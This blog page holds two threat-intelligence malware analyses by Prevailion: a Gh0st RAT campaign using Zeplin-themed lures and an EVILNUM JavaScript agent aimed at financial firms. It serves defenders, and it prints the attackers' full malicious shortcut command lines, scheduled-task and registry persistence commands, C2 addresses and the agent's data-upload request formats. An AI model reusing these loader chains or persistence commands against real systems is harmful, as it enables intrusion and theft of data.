Friday, June 5, 2020

The Gh0st Remains the Same

Author: Danny Adamitis 

Executive Summary 

Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “The Gh0st Remains the Same.”  This first campaign likely commenced between May 11th and 12th, 2020. In this engagement, the victims received a compressed RAR folder that contained trojanized files. If the malicious files were engaged, they displayed decoy web pages associated with the software company “Zeplin”. Zeplin is a software company that developed a platform to create a “connected space for product teams,'' and boasts over three million customers. Some of Zeplin’s more prominent users include: Starbucks, Airbnb, Slack, Dropbox, Pinterest, Shopify, Feedly and MailChimp. It is likely they chose to simulate collaboration-based software with a sizable user base, as a result of the increase in working from home (WFH) during the global pandemic.

This is a user-initiated infection, in this case the lure was a folder called “Project link and New copyright policy.rar”. Once decompressed, this folder contains two Microsoft shortcut files and a PDF, all of which reference the Zeplin platform. If the shortcut file was initiated it would begin a multistep infection chain that ultimately deployed a Ghost rat agent. This agent persisted on an infected machine by employing a scheduled task, while masquerading as a legitimate binary in the Windows startup folder. During the infection process, the subject machine communicated with three different remote command and control (C2) nodes. There were also indications that the agents could communicate over DNS as well as HTTP protocols.

We assess that the threat actor group is both technically proficient and experienced, based upon the Tactics, Techniques and Procedures (TTPs) displayed in this campaign - such as splitting up the attack into a myriad of steps and XORing parts of the payload to suppress the antivirus software detection rate. The threat actors exercised good tradecraft by keeping their malicious domains online for just a few days after the campaign started. The sample in question was uploaded to VirusTotal on May 12th, likely indicating when it was observed in the wild, and on the same day that the Zeplin Platform launched their new program “Zeplin Agency Members.” Furthermore, we observed a subsequent campaign employing the same infection process, that commenced on 30 May 2020. This particular campaign differed in its use of a trojanized Curriculum Vitae (CV) impersonating a college student named “Wang Lei” from Hong Kong, and the use of a hard-coded IP address in lieu of a threat actor controlled domain.

Through analyzing the timestamps, we noticed that they align with the +8 time zone. Additionally, we noticed a number of correlations between this campaign and a “Coronavirus (COVID-19) Situational Report” campaign that occurred earlier this year that was associated with Higaisa. Those correlations were significant enough that we assess with moderate confidence that Higaisa is also behind this campaign. Prior reporting suggests that the Higaisa group is likely government sponsored.

Technical Details


Prevailion’s tailored intelligence team discovered a campaign that highlights an elegant use of commercially available tools by an advanced adversary. We suspect this actor intentionally chose commercially available frameworks to provide a level of anonymity and plausible deniability. If the malicious files were engaged, they displayed decoy web pages associated with the software company Zeplin. Zeplin is a software company that developed a platform to create a “connected space for product teams” and boasts over three million customers. It is likely they chose to simulate collaboration-based software with a sizable user base, as a result of the increase in working from home (WFH) during the global pandemic. By analyzing google trends, we noted that the Zeplin app was of interest in the United States, United Kingdom, and India, which possibly hint at the targeted entities.

Google Trends for Zeplin App

The threat actors appeared to create the decoy file seven days prior to the malicious files being observed in the wild. They also took down their infrastructure a short time after the attack began - highlighting an acute level of situational awareness. We assess that the campaign likely commenced between May 11th, 01:03:02 and May 12th 17:59:57. The rar file was first uploaded to VirusTotal on May12th at 17:59:57, which likely denotes when the sample was first observed. It’s unclear if it was intentional, or simply fortuitous, that the campaign occurred the same day that the Zeplin Platform launched their new “Zeplin Agency Members”. Such an announcement could conceivably result in copyright provisions change, which would be unlikely to draw scrutiny from their established user base.

Campaign Timeline

      May 5th the PDF file “Zeplin Copyright Policy” was created 2020:05:06 08:37:39
      May 6th the contents of PDF file “Zeplin Copyright Policy” were last modified 00:37:41
      May 8th files svchast.exe and 3t54dEr.tmp were created at the same time 23:17:58
      May 9th the domain comcleanner dot info starts to resolve to the dedicated VPS
      May 11th the lnk microsoft link file was created by the threat actors 01:03:02
      May 11th-12th, the victims received the trojanized RAR file
      May 12th Zeplin announcement “Introducing Zeplin Agency Members” at 12:03
      May 12th The file “Project link and New copyright policy.rar” was first submitted to VT 17:59:57
      May 16th the domain comcleanner dot info stopped resolving

Campaign Timeline Graphic (click to expand)

Infection Vector

Infection chain used in the May 2020 Campaign

The infection chain began when the victims received an rar file named “Project link and New copyright policy.rar”. Once the file was decompressed, the folder contained two microsoft shortcut (lnk) files and a PDF file. The three files were named:
      Zeplin Copyright Policy.pdf
      Conversations - iOS - Swipe Icons - Zeplin.lnk
      Tokbox icon - Odds and Ends - iOS - Zeplin.lnk

The PDF file “Zeplin Copyright Policy,” which was benign, was taken from the Zeplin public website. The actor used the tool wkhtmktopdf  to convert the website to a PDF on May 5th at 09:37:39 UTC. They then modified the file the following day, May 6th 00:37:41; the only difference between the website and PDF was the last updated line. In the actor-modified version, the last updated line was dated “1 May 2020”, while the Zeplin website listed the last updated line as “18 October 2019”. We assess that its purpose was to act as a decoy, in case the PDF was examined further by security products.

Image of the modified PDF file that was displayed to victims

The victim is then enticed to click on one of the Microsoft shortcut files that executes a series of commands which begins the attack. The Microsoft shortcut file’s properties and purpose will be explored in the following section. The lnk file contained a “decoy” component, and would open a web browser to display a webpage hosted on the domain, When visited this webpage was only accessible to a certain organization.

A copy of the aforementioned decoy Zeplin web page when visited by an outside account

Microsoft Link Lures

The Prevailion team first analyzed the metadata properties of the lnk files to look for any artifacts that might have been left by the file creator. We found that almost all such metadata had been intentionally stripped out by the adversary. Typically LNK files contain useful information about the originators computer such as Machine ID, Drive serial numbers, Mac Address, Volume, and file systems. However the only thing left in these two samples was the creation date of the file May 11th, 2020, timestamp 08:03:01.0 [UTC] and the date the C drive was created 03/18/2019 (21:37:44.0) [UTC].

When the file is executed, it pulls a block of data from the lnk file and saves it as cSi1rouy.tmp. It will then base64 decode that data, which reveals a Microsoft Cabinet file (.cab). Microsoft Cabinet files are “an archive-file format for Microsoft Windows that supports lossless data compression and embedded digital certificates used for maintaining archive integrity.” Once the cabinet file is decompressed it reveals four more files:
      Svchast.exe (Note this was the threat actor’s spelling of the file)
      Conversations - iOS - Swipe Icons - Zeplin.url

A copy of the full command line argument has been copied below.
C:\Windows\System32\cmd.exe /c  copy "Conversations - iOS - Swipe Icons - Zeplin.lnk" %temp%\g4ZokyumB2DC.tmp /y& for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %temp%\gosia.exe /y& findstr.exe /b "TVNDRgA" %temp%\g4ZokyumB2DC.tmp>%temp%\cSi1rouy.tmp&%temp%\gosia.exe -decode %temp%\cSi1rouy.tmp %temp%\o423DFDS.tmp&expand %temp%\o423DFDS.tmp -F:* %temp%&"%temp%\Conversations - iOS - Swipe Icons - Zeplin.url"&copy %temp%\3t54dE3r.tmp C:\Users\Public\Downloads\3t54dE3r.tmp&Wscript %tmp%\34fDFkfSD32.js&exit
Icon location (UNICODE):              
 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Javascript File 

The last function of the command line is to initiate the javascript file “34fDFkfSD32.js.” The javascript file spawns a hidden command shell, runs ipconfig and redirects the output to a file called “d3reEW.txt”. The file is then sent to a presumed threat actor hostname hxxp://zeplin[.]atwebpages[.]com/inter.php after sleeping for 1000 seconds.

Next, the javascript file copies svchast.exe to the Windows Startup folder, that file path was:
%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\officeupdate.exe

Copying the malicious file to this path is significant for two reasons. First, it allows for persistence on the infected machine, as the programs inside this folder are automatically initiated upon start up. Second, it was intended to blend into the target environment by masquerading as the legitimately signed Microsoft program officeupdate.exe, sha1:7fc78cce74b31414278444eff8c99156d98c2bcd. In order to have some redundancy, the threat actor copies the loader file, svchast.exe, to the downloads folder and renames it officeupdate.exe. They created a scheduled task with the name “Driver Booster Update” to run every two hours and execute the officeupdate.exe file located in the downloads folder. Finally, it launches the svchast.exe file through a command shell. 

Loader And ShellCode

For the sake of clarity, I will continue to call this particular file svchast.exe, in order to prevent confusion with the legitimate binary officeupdate.exe. Svchast was designed as a Win64 portable executable (pe) file, that had a time stamp listed as 2018:08:28 01:57:55-07:00. Upon further analysis, the last modification date was listed 2020:05:08 23:17:58-07:00, three days prior to the lnk file being created. This file loads the main payload,3t54de.tmp, from the Downloads folder where it was placed by the aforementioned javascript. Svchast.exe would check the file type and size. The loader will determine if it is being run in a debugger, as an anti-analysis check. If it is, the file will cease execution. If the file is not being run in a debugger, it will then XOR decode a section of the 3t54dE3r.tmp file with the key 0xCF. Once complete, it injects into the running process.

Function loading the 3t54de.tmp file on the left, Anti-debugging function on the right

The last file to discuss is 3t54de.tmp, which was located in the previously mentioned Microsoft Cabinet file. This appeared to be a shellcode that contained the threat actor C2 node. It performs some host based enumeration upon the infected machine, then establishes a persistent connection between the infected host and the C2. 

This appeared to be an evolution of the previous loader (sha1:640682ef5b228d940634d161b7038ad002288aca) that was used by the Higaisa in 2019, where it was all one compiled executable. By using the process injection method, the threat actor lowered its detection rate. As of May 22, only 3 antivirus engines out of 73 detected the svchast file as being malicious, and 3t54de.tmp had a detection rate of zero.

During our analysis of the aforementioned sample, we identified an embedded URL hxxps://comcleanner[dot]info/msdn.cpp. Unfortunately the threat actor stopped resolving the domain approximately four days after the campaign started, therefore we were unable to enumerate any subsequent payloads. We did attempt to create a honey-pot machine however we were not served the malicious payload, for either this campaign or the “Collin CV Campaign.” We ran the CV sample on Friday May 29th, the day the sample was first uploaded to Virustoal. We were not able to locate a file by that name in our malware repositories. In previous reporting, the threat actors were noted deploying an in-memory version of the Gh0st rat payload. It should be noted that the source code for this agent has been available online since 2008.

One interesting note was that files ending in the extension .cpp, typically indicates a file containing code written C++. However we did find one reference to the file “msdn.cpp.” It appeared in a tweet by @bad_packets, where they observed mass scanning for that URL by an undisclosed security researcher that operates the domain Tequillaboomboom dot club.

Command and Control Communications

Another compelling detail we observed was the threat actor configured redundant communications channels during this particular campaign. The first command and control node employed was the hostname hxxp://zeplin[.]atwebpages[.]com/inter.php - which would receive the output of the ipconfig command. While this might seem trivial, this could be used as a filtering mechanism by the threat actor to determine if they compromised their intended target’s workstation. This method can confirm that they are not interacting with a honeypot machine. They could also determine if something had run afoul, if they see connections to the subsequent C2 from an IP address not in the first one. In order to disguise their malicious hostname to appear more legitimate, the threat actors cloned a templated resume web page from

Resume web page from BootstrapTemple to the left, actor controlled website to the right

The payload interacts with two supplementary C2 nodes. First contact is with the authoritative name server, in order to obtain the IP address for the embedded domain comcleanner[dot]info. In this particular case, the authoritative name server was ns1[dot]comcleanner[dot]info. Querying this name server would return the IP address 66.42.96[.]115 for the domain comcleanner[dot]info. When we ran a query on the IP address 66.42.96[.]115 in Zetalytics, we noticed that the domain comcleanner[dot]info stopped resolving to it on May 15th, 2020. We thought it was of interest that the domain only resolved for a small 6 day window in total, and was likely taken down a few days after the initial campaign began. We feel this shows that the threat actor behind this campaign exhibited a high degree of operational security, and that the threat actor may have changed C2 nodes once they infected the target.

One other notable fact was that the name server ns1[dot]comcleanner[dot]info was also hosted on a dedicated VPS, at IP address 45.76.31[.]159. If they did once again use the Gh0st rat payload, as in previous campaigns, they would have the ability to perform DNS tunneling. We assess this was likely configured as an alternate communications channel, if they had trouble communicating with the infected device through the standard HTTP protocol.

Correlations to Known Threat Activity  

While this operation did not employ a new trojan, they utilized multiple files in different formats to break the attack up into a myriad of steps, rather than just using one stand alone executable. This technique allowed them to keep the detection rate low and their trojan remained undetected. They also made efforts to complicate some aspects of analysis; such as removing metadata from the lnk files, timestomping the executable, and adding debugger checks. These tactics lead us to assess that this campaign was performed by a sophisticated threat actor.

By analyzing individual elements of this campaign, we noted a number of correlations to prior threat actor reporting. Some of the more interesting data points came from the timestamps left behind by the originator. We found the decoy PDF file to be particularly revealing, the metadata extracted through ExifTools is listed below.

ExifTool Version Number         : 11.87
File Name                                : Zeplin Copyright Policy.pdf
Directory                                  : .
File Size                                  : 27 kB
File Modification Date/Time     : 2020:05:06 00:37:41-07:00
File Permissions                      : rw-r--r--
File Type                                  : PDF
File Type Extension                 : pdf
MIME Type                              : application/pdf
PDF Version                            : 1.4
Linearized                                : No
Title                                          : Zeplin Copyright Policy | Zeplin
Creator                                    : wkhtmltopdf 0.12.5
Producer                                  : Qt 4.8.7
Create Date                             : 2020:05:06 09:37:39+02:00
Page Count                              : 1
Page Mode                              : UseOutlines

Two particular data points from this PDF were the “Create Date” and the “FIle Modification date/time.” The create date shows that this file was created on May 6th at 09:37:39 UTC, and was last modified the following day at 00:37:41 UTC. We noticed that these times align with the +8 timezone, which is used in the Korean peninsula among other countries. Porting these times from UTC to the +8 timezone, the file would have been created at approximately 5:37 PM. After the file was created, the actor likely went home for the night and then subsequently modified it the following morning when they arrived at work at 8:37 am local time.

We observed similar TTPs displayed earlier this year in a separate Coronavirus (COVID-19) themed campaign that was reported here. We noted parallels in the Microsoft shortcut command syntax, embedding a Microsoft Cabinet file within a lnk file, and the use of Javascript.

Based upon the totality of available information, we assess with high confidence that this campaign was performed by the same actors responsible for the Coronavirus, Covid-19, themed campaign in March. Based upon the timestamp analysis and the overlapping infrastructure between the Anomali and Tencent report, we assess with moderate confidence that this cluster was associated with Higaisa. Previous reporting suggests that the Higaisa group has been active since 2016. Our assessment would be bolstered by uncovering subsequent agents deployed in this operation as well as associating subsequent campaigns to this cluster of activity.


While none of the tools used in this particular campaign were completely new or innovative, we believe that the threat actor made the most of every tool they used and was likely able to avoid detection. They also created the Zeplin lure, in order to pry upon the current situation and take advantage of the collaborative software in a WFH environment. However, through careful examination of these artifacts, analysts can find little clues to help them gain a better understanding of the campaign. In order to curtail these nefarious efforts, we recommend that all users exercise great caution when receiving emails from an unknown source. We also advise against executing any Microsoft shortcut links, especially from untrusted sources. We recommend enabling and updating antivirus services, since this threat actor relied upon commercially available toolkits. Where viable, increase monitoring network logs for remote connections to VPS providers.

Indicators of Compromise

First Campaign
Project link and New copyright policy.rar
Zeplin Copyright Policy.pdf - (benign file)
Conversations - iOS - Swipe Icons - Zeplin.lnk
Tokbox icon - Odds and Ends - iOS - Zeplin.lnk
cSi1rouy.tmp - Microsoft Cab file
Conversations - iOS - Swipe Icons - Zeplin.url (benign file)
Svchast.exe a.k.a. Malicious officeupdate.exe

Command and Control
            IP address: 66.42.96[.]115
            IP address: 45.76.31[.]159

Second campaign
International English Language Testing System certificate.pdf.lnk
Curriculum Vitae_WANG LEI_Hong Kong Polytechnic University.pdf.lnk
Cabinet File

Command and Control

Third Campaign
Unidentified Campaign Likely occurring January 2020
7zip file

Command and Control
            IP address:149.28.78[.]89

Host Based Indicators
schtasks /create /SC minute /MO 120 /TN "Driver Bootser Update"
schtasks /create /SC minute /MO 120 /TN "Office update task"
%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\officeupdate.exe

MITRE ATT&CK Framework Mapping
Initial Access
SpearPhishing Attachment (T1193)
User Execution (T1204)
Scheduled Task (T1053), Startup item (T1165)
Defensive Evasion
Masquerading (T1036), Process Injection (T1055), TimeStomp (T1009)
Data from Local System (T1005)
Command & Control
Commonly used port (T1043), Web service (T1102),
Remote File copy (T1105), Fallback Channels (T1008)
Exfiltration Over Command and Control Channel (T1041), Exfiltration over Alternative Protocol (T1048)

Wednesday, May 6, 2020

Phantom in the Command Shell

Author: Danny Adamitis 

Executive Summary

Prevailion’s Tailored Intelligence Team has detected two new criminal campaigns targeting the global financial industry with the EVILNUM malware, one of which became active on May 3rd 2020. We have dubbed these new operations “Phantom in the [Command] Shell”.

In these engagements, the attack begins when a victim is enticed into following a link to a file hosted on a well known, widely-used cloud provider - unaware that email filters are unlikely to block the domain, and the provider will trust their own links enough that a scan is unlikely. Once engaged, the victim’s device downloads a compressed folder that contains trojanized files. This is a user-initiated infection; meant to appear as a typical business interaction, in this case part of “Know Your Customer” banking procedures. These trojanized files use images of credit cards, driver’s licenses, passports, and utility bills. When the files are opened, the decoy images are displayed to the user, while an agent written in headless Javascript is surreptitiously invoked. Investigation of the agent reveals code comment indicating the two latest iterations are version 3.6 and 4.0, respectively. Both are designed for Windows OS.

The first version of EVILNUM was identified in 2018; the second version was discovered in an unrelated incident response investigation a year later, having infiltrated a FINTECH company. The initial reporting on this malware was the only sign of its presence, as it briefly faded from view.

EVILNUM has surfaced again in the financial sector with a new variant that has evolved with a very effective tool designed to evade both standard network- and host-based detection systems. It uses supplementary logic designed to help it adapt to the local system and alter its actions - and even the choice of C2 - based upon the antivirus products that are detected on the host machine. This agent allows the threat actor to upload files, download files, run commands, steal cookies and access other protected data. It is designed to persist through reboot by adding a registry key, and even removes artifacts of its presence from the host machine. Given the versatility added to this variant, we suspect that this agent has the capacity to load auxiliary payloads onto a host machine.

Technical Details


Prevailion has discovered an updated variant of the deceptive EVILNUM agent. This agent was delivered to victims from a URL on a cloud-platform that hosts a zip file. If the link is clicked, the victim downloads a compressed folder riddled with trojanized files that masquerade as PDFs and JPEGs. These files display themselves as seemingly innocuous decoys to the end user, all while quietly running in the background. The first version of EVILNUM malware was observed and reported in 2018. The second version was reported by Palo Alto, targeting a specific financial technology (FinTech) organization. This report covers the latest versions 3.6 and 4.0, how they’re delivered, evasion techniques, and communications channels.

Infection Vector

The infection chain begins when the victim receives a link to a Uniform Resource Locator (URL) hosted on a cloud-based platform, in this case GoogleDrive. This technique is increasingly used to avoid intrusion detection system (IDS) rules, by hosting the malicious file on a 3rd party platform that was likely whitelisted. When that link is clicked and traffic to GoogleDrive is initiated, it begins the process of downloading a compressed folder from that location. 
Phantom in the command shell campaign walk through

Microsoft Link Lures

Prevailion has thus far identified two compressed files harboring the subject malware, although there is evidence to suggest that more zip folders exist. Once decompressed, the folder is found to contain microsoft shortcut (lnk) files that were named to impersonate either jpeg or pdf files. We have categorized these lnk files into two subcategories. The first set of lures uses the basic Know Your Customer (KYC) elements as a ruse, these elements are files that anyone would be asked for when opening a new account with a finance services organization. Some examples include but are not limited to driver’s license, credit cards, credit history documents, and proof of address paperwork. The second subcluster includes a document that appears to impersonate an established financial services organization, and referenced their 2020 GDPR compliance plan. Given the nature of these lures, Prevailion suspects with moderate confidence these efforts were targeted towards select financial institutions rather than wide-scale spamming.

Once decompress the first zip folders contained the following KYC files:
      Driv License front.jpg.lnk
      Driv License back.jpg.lnk
      Credit Card Front.jpg.lnk
      Credit Card Back.jpg.lnk
      Utility Bill.jpg.lnk.

The name on the drivers license corresponds to a real person, who happens to be the CEO of a Bank located in a British territory. The address on the utility bill matches the city of the bank. The second compressed folder was very similar to the first, containing various KYC documents and impersonated a Canadian person who we suspect works for a different financial organization. The last KYC client file that we identified was a Finnish national that we suspect works for a managed cloud services provider. Prevailion was unable to confirm if these documents were authentic, however if forged they closely resemble the genuine article.

The second subcategory contains a file name that references an organization rather than an individual. The document impersonates an investment company located in England.  Like the previously mentioned lnk files, when clicked by the user it launches a script to run in the background of the computer.

As we mentioned, there is added functionality built into this particular agent, and one element is in the display of a decoy file that corresponds to the selected file name. We analysed the properties of the lnk file themselves with lnk parser to search for clues left behind by the actor. However all the lnk files had the same forged metadata; the files were timestomped with a creation date of September 5th, 2018, from a VMWare device based upon the mac address, that had a NetBIOS name of “admin-pc”, suggesting they went to some lengths to obfuscate the metadata related to their activities. The lnk file properties can be found below. 

[Distributed Link Tracker Properties]
Version:                                      0
NetBIOS name:                          admin-pc
Droid volume identifier:              a82e4430-d4a8-417a-b678-88e886bec590
Droid file identifier:                     8cb9d0c4-b0f4-11e8-b065-005056c00008
Birth droid volume identifier:      a82e4430-d4a8-417a-b678-88e886bec590
Birth droid file identifier:             8cb9d0c4-b0f4-11e8-b065-005056c00008
MAC address:                            00:50:56:c0:00:08
UUID timestamp:                       09/05/2018 (10:15:01.429) [UTC]
UUID sequence number:           12389

Loader Functionality

Opening any one of the files, such as “Credit Card Front,” executes a protracted command line argument. The first operation moves the file to the Temp folder and renames it “1.lnk”. Then it proceeds to search for all the files that start with “Cred” in the Temp directory, and search recursively in all directories modified that day. Next it reads the 1.lnk file and redirects the output into a new file named 0.js, It then uses csript to execute that file. The command is as follows:

"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card front.jpg.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"

Core Agent

This file, 0.js, is the main agent deployed to the victim’s machine. It's written in Phantom and this particular script was designed for Windows OS. One comment in the code suggested that this particular iteration was version 3.6. One of our favorite elements was the use of a one-way communication method to obtain the C2, in order to remain elusive. This agent also built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack. 

Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information:
      AntiVirus Products

This agent had traditional trojan functionality, that allowed it to perform the following tasks:
      Upload files
      Download files
      Harvest cookies 
      Get Files, from the C2,
      Run arbitrary commands
      Run Windows Script Component (.sct) files
      Call a python 2.7 interpreter through rundll32
      Log any errors that the agent generated

One difference between this variant and previous iterations is the removal of the screenshot functionality. This agent did maintain some original functions such as: bringing files down from the C2, and converting strings of data into bytes and receiving binary data. This suggests the agent was capable of retrieving subsequent payloads, indicating it was likely just a first stage agent.

Retrieval of C2 Address

One of the first things the agent does is ping google to check for an internet connection. If the host machine is connected to the internet, the agent proceeds to kill any instances of Internet Explorer which have the command line parameter matching “-Embedding.” It then uses Internet Explorer to retrieve a remote web page that acts as a one-way communication method, that web page contains a string that identifies the corresponding C2 node.

Like the previous variants of EVILNUM, the actor set up accounts on GitLab and Digital Point, a web forum. The four primary URLs used as drop sites for one-way communications were:

The actor likely set up two web pages that corresponded to each campaign for redundancy. The function would periodically check those two web pages every 180000 seconds (50 hours).
Metadata properties of the most recent campaign show that the “bliblobla123” Gitlab account was created on May 3rd, 2020.
Image showing the date when the Gitlab account was created
Image showing the latest C2 embedded in the README.MD file

The “johndeer123” Digital Point account associated with version 3.6, was created on February 21, 2019. One of the differences in the 3.6 and 4.0 variants is that the agent obtains the IP address through a regex search for the string “8346758545”. On the Digital Point web forum instance the observed C2, hxxp://185.62.190[.]89, was stored as a value in the “interest” field.
Image of Johndeer123 Digital Point Profile

If the host is running BitDefender, EVILNUM will reach out to a different URL
hxxps:// The agent then searches for the same string “8346758545”. There is also some fallback functionality to use “long2ip”, the arithmetic based method, implemented in the previous agent. This method takes the number then divides it by 8 and converts it to an IP address.

Command and Control Communications

Once the agent obtains the IP address it will send a GET request to check.php. If the IP address is indeed the correct C2, it returns a message padded with “jifhruhajsdfg444” on each side. In this case it received a padded “success” message:

Wireshark stream of a check interaction from the victim to the C2

Once the agent confirms the correct IP address, it proceeds to send a register request. In this POST it sent the host based enumeration information. Once received the
C2 responded with the agent’s unique identifier that will then get saved at
appDataPath + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\id.txt.

Image of the register function with version 3.6 on the left and 4.0 on the right

Based upon code analysis the following HTTP requests and parameters were identified:
      “check.php?id="+id + "&ver="+ ver
      Agent confirms it has the right IP address and sends version number
      “register.php?av=" + av + "&cpu-name=" + cpuName + "&ref="+ REFNAME + "&user=" + userName
      Registers the agent with the C2 and obtain unique identifier
      "view.php", "id=" + id);
      Get commands from the C2
      Upload harvested cookies to the C2
      "DOWNLOAD_FILE.php".toLowerCase(), "FILE-URL=".toLowerCase() + fileURL
      Download file from C2 then place in tmp and appData folders
      "send.php?id="+id, filePath, "uploaded_file"
      Upload file from infected host to C2
       "upload.php?id="+id, sctFile, "uploaded_file"
      obtain windows script component from from C2, then store it “878478ddd3.TMP”


As we described, the agent will persist through a reboot by adding a registry key. This is the same technique that was used in the 2.0 version. One notable feature is that the actor added logic to modify the registry key location, based on the antivirus product that was detected during the enumeration phrase. In the previous version, it would only specify what to do when BitDefender was installed on the host. The new version added functionality to account for Avast.  If either one of those two antivirus specific products were detected it created a registry key at:
If there is no antivirus product detected - or something other than BitDefender and Avast - it will create a registry key at:
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows.

Both keys will then run a shortcut file specified at the path:

This shortcut file maps to the media.js file, which contains a copy of the core agent. This set of registry persistence modifications are stored in a file named media.reg.

The second registry modification file, mediaIE.reg, is the same file that has been used since version 1 of EVILNUM. These registry modifications appear to have remained consistent with the newest iteration versions. The modifications are intended to weaken the security of the host machine. For example -  one modification removes the “no protect mode” banner, potentially luring victims into a false sense of security. Another example is the removal of a feature of CCleaner that clears data downloaded from browsers, this is likely meant to ensure downloaded scripts or tools were not removed. The registry keys and modified parameters are listed below.
      HKEY_CURRENT_USER\\Control Panel\\Cursors "AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,0
      This decodes to “%.S.y.s.t.e.m.R.o.o.t.%.\.c.u.r.s.o.r.s.\.a.e.r.o._.a.r.r.o.w...c.u.r…”
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PhishingFilter
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ Advanced
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3


The Phantom in the Command Shell campaign shows that the threat actors behind the EVILNUM malware family are constantly advancing their techniques as they continue to focus their efforts on the global banking/financial system. The differences between the 3.6 and 4.0 variants appear to be trivial and do not affect functionality.

This group has been targeting the financial sector since 2018 and has achieved success due to their ability to use innovative methods to stay ahead of defensive measures, such as the use of javascript-based agents instead of relying upon more commonly used methods such as executable files. They have continued to evolve this agent by modifying the location of certain files to avoid detection by specific antivirus products and changing communications patterns when certain products are being employed. They created an elaborate command and control retrieval tactic by embedding instructions to use well known platforms, in order to bypass detection. They also configured the agent to use different C2 nodes depending on the security products used by the host machine.

One possible way to protect against this threat, is to disable Microsoft shortcut files on high risk machines that routinely interact with untrusted parties. These high risk machines should also be segmented within the network to impede attackers' ability to spread laterally if they were compromised. We recommend routinely monitoring network logs to check for abnormal connections to IP addresses associated with virtual private servers.

Prevailion has shared our findings with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit

Indicators of Compromise

GDrive URLs

Zip Files

Microsoft ShortCut (Lnk) Files

Core Agent
Javascript agent version 4.0
Javascript agent version 3.6
Javascript agent version 3.5

Actor created Folders
appData + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\
appData + \\Microsoft\\Credentials\\MediaPlayer\\UtilitiesLog\\

C2 Retrieval URLs

Command and Control Node

MITRE ATT&CK Framework Mapping
Initial Access
Spear Phishing Link (T1192)
User Execution (T1204)
Registry Run Keys / Startup Folder (T1060)
Defensive Evasion
Timestomping (T1099), Indicator Removal from host (T1070),
Modify Registry (T1112), Hidden Window (T1143), rundll32 (T1085),
Credential Access
Steal Web Session Cookie (T1539)
Data from Local System (T1005),  Data Staged (T1074)
Command & Control
Commonly used port (T1043), Web service (T1102),
Remote File copy (T1105)
Exfiltration Over Command and Control Channel (T1041)

The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...